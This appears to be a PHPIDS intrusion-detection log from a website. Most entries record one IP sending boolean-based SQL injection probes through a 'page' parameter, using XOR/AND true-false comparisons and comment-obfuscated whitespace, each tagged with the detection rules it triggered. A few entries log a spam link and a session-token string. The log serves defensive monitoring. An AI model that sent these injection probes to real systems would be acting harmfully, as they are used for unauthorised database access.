| ID: | 123065 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:34:03 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123066 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:34:03 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123061 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:02 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123062 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:02 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123063 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:02 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123064 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:02 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123059 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:01 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123060 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:01 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123057 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:00 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123058 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 38 | | Created: | 2010-04-30 01:34:00 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123055 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:58 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123056 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:58 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123053 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:57 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123054 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:57 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123051 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:52 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123052 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:52 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123049 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:51 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123050 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:51 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123047 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:50 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123048 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:50 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123045 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:49 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123046 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:49 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123043 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:48 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123044 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:48 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123041 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:47 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123042 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:47 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123039 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:46 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123040 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:46 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123037 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:45 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123038 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:33:45 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123033 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123034 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123035 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123036 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3 | | IP: | 110.230.228.252 | | Impact: | 6 | | Created: | 2010-04-30 01:33:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123031 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:43 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123032 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:43 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123029 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:42 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123030 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:42 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123027 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:39 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123028 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:39 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123025 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:38 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123026 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 46 | | Created: | 2010-04-30 01:33:38 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123023 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'`([{^~ | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E | | IP: | 110.230.228.252 | | Impact: | 24 | | Created: | 2010-04-30 01:33:35 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.8666666666667 Converted: ((((+++::
|
| ID: | 123024 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'`([{^~ | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E | | IP: | 110.230.228.252 | | Impact: | 24 | | Created: | 2010-04-30 01:33:35 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.8666666666667 Converted: ((((+++::
|
| ID: | 123021 | | Name: | REQUEST.codeme | | Value: | Good Job, <a href= http://buynowpaylaternocreditche.imagekind.com/#1 >buy now pay later no credit check free</a> [url=http://buynowpaylaternocreditche.imagekind.com/#1]buy now pay later no credit check free[/url], schel, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 00:50:57 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123022 | | Name: | POST.codeme | | Value: | Good Job, <a href= http://buynowpaylaternocreditche.imagekind.com/#1 >buy now pay later no credit check free</a> [url=http://buynowpaylaternocreditche.imagekind.com/#1]buy now pay later no credit check free[/url], schel, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 00:50:57 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123019 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=23874815&CFTOKEN#=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#lastvisit={ts '2010-04-22 18:33:30'}#timecreated={ts '2010-04-22 18:33:30'}#hitcount=2#cftoken=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#cfid=23874815# | | Page: | / | | IP: | 69.175.7.130 | | Impact: | 64 | | Created: | 2010-04-30 00:36:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0833333333333 Converted: ((((+::
|
